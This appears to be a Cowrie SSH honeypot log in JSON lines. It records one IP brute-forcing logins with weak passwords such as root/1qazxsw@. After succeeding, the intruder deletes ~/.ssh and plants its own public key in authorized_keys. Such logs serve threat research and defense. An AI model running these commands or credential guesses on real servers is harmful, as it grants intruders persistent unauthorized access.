{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:07.668514Z","src_ip":"212.227.235.229","session":"db892f1710c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54618,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a998db43b15","protocol":"ssh","message":"New connection: 212.227.235.229:54618 (1.2.3.4:22) [session: 1a998db43b15]","sensor":"my-vps","timestamp":"2025-09-08T22:46:20.731345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:20.732122Z","src_ip":"212.227.235.229","session":"1a998db43b15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:21.062889Z","src_ip":"212.227.235.229","session":"1a998db43b15"}
{"eventid":"cowrie.login.failed","username":"user","password":"Password","message":"login attempt [user/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T22:46:22.427943Z","src_ip":"212.227.235.229","session":"1a998db43b15"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:23.760666Z","src_ip":"212.227.235.229","session":"1a998db43b15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45046,"dst_ip":"1.2.3.4","dst_port":22,"session":"abb62f4657eb","protocol":"ssh","message":"New connection: 212.227.235.229:45046 (1.2.3.4:22) [session: abb62f4657eb]","sensor":"my-vps","timestamp":"2025-09-08T22:46:39.012016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:39.029839Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:39.276126Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw@","message":"login attempt [root/1qazxsw@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:46:40.309674Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:46:40.799622Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:46:40.800333Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:46:40.801230Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:41.028392Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:46:41.580237Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:46:41.580910Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:46:41.777486Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:41.778387Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46330,"dst_ip":"1.2.3.4","dst_port":22,"session":"2339c8757e6b","protocol":"ssh","message":"New connection: 212.227.235.229:46330 (1.2.3.4:22) [session: 2339c8757e6b]","sensor":"my-vps","timestamp":"2025-09-08T22:46:42.011266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:42.041543Z","src_ip":"212.227.235.229","session":"2339c8757e6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:42.288895Z","src_ip":"212.227.235.229","session":"2339c8757e6b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:46:43.296391Z","src_ip":"212.227.235.229","session":"2339c8757e6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58406,"dst_ip":"1.2.3.4","dst_port":22,"session":"47449ec5e399","protocol":"ssh","message":"New connection: 212.227.235.229:58406 (1.2.3.4:22) [session: 47449ec5e399]","sensor":"my-vps","timestamp":"2025-09-08T22:46:44.292032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:44.293073Z","src_ip":"212.227.235.229","session":"47449ec5e399"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:44.395332Z","src_ip":"212.227.235.229","session":"47449ec5e399"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:44.530001Z","src_ip":"212.227.235.229","session":"2339c8757e6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47408,"dst_ip":"1.2.3.4","dst_port":22,"session":"621fe92443ae","protocol":"ssh","message":"New connection: 212.227.235.229:47408 (1.2.3.4:22) [session: 621fe92443ae]","sensor":"my-vps","timestamp":"2025-09-08T22:46:44.760977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:44.785347Z","src_ip":"212.227.235.229","session":"621fe92443ae"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat1234","message":"login attempt [tomcat/tomcat1234] failed","sensor":"my-vps","timestamp":"2025-09-08T22:46:44.839640Z","src_ip":"212.227.235.229","session":"47449ec5e399"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:45.029262Z","src_ip":"212.227.235.229","session":"621fe92443ae"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:45.941981Z","src_ip":"212.227.235.229","session":"47449ec5e399"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:46:46.029745Z","src_ip":"212.227.235.229","session":"621fe92443ae"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:46.285704Z","src_ip":"212.227.235.229","session":"621fe92443ae"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:46.286553Z","src_ip":"212.227.235.229","session":"abb62f4657eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44312,"dst_ip":"1.2.3.4","dst_port":23,"session":"da89d4c5769c","protocol":"telnet","message":"New connection: 212.227.235.229:44312 (1.2.3.4:23) [session: da89d4c5769c]","sensor":"my-vps","timestamp":"2025-09-08T22:46:47.532238Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42014,"dst_ip":"1.2.3.4","dst_port":22,"session":"50d896c4defd","protocol":"ssh","message":"New connection: 212.227.235.229:42014 (1.2.3.4:22) [session: 50d896c4defd]","sensor":"my-vps","timestamp":"2025-09-08T22:46:50.858737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:50.859822Z","src_ip":"212.227.235.229","session":"50d896c4defd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:51.168813Z","src_ip":"212.227.235.229","session":"50d896c4defd"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:46:52.407444Z","src_ip":"212.227.235.229","session":"50d896c4defd"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:46:53.720351Z","src_ip":"212.227.235.229","session":"50d896c4defd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58220,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ee253fe83c5","protocol":"ssh","message":"New connection: 212.227.235.229:58220 (1.2.3.4:22) [session: 3ee253fe83c5]","sensor":"my-vps","timestamp":"2025-09-08T22:46:58.723385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:46:58.724388Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:46:59.947923Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Yq123456","message":"login attempt [root/Yq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:47:00.708636Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:47:01.240124Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:47:01.240617Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:47:01.241774Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:01.501505Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:47:02.114807Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:47:02.115548Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:47:02.371079Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:47:02.371913Z","src_ip":"212.227.235.229","session":"3ee253fe83c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58232,"dst_ip":"1.2.3.4","dst_port":22,"session":"f680276215e4","protocol":"ssh","message":"New connection: 212.227.235.229:58232 (1.2.3.4:22) [session: f680276215e4]","sensor":"my-vps","timestamp":"2025-09-08T22:47:02.622352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:47:02.623136Z","src_ip":"212.227.235.229","session":"f680276215e4"}
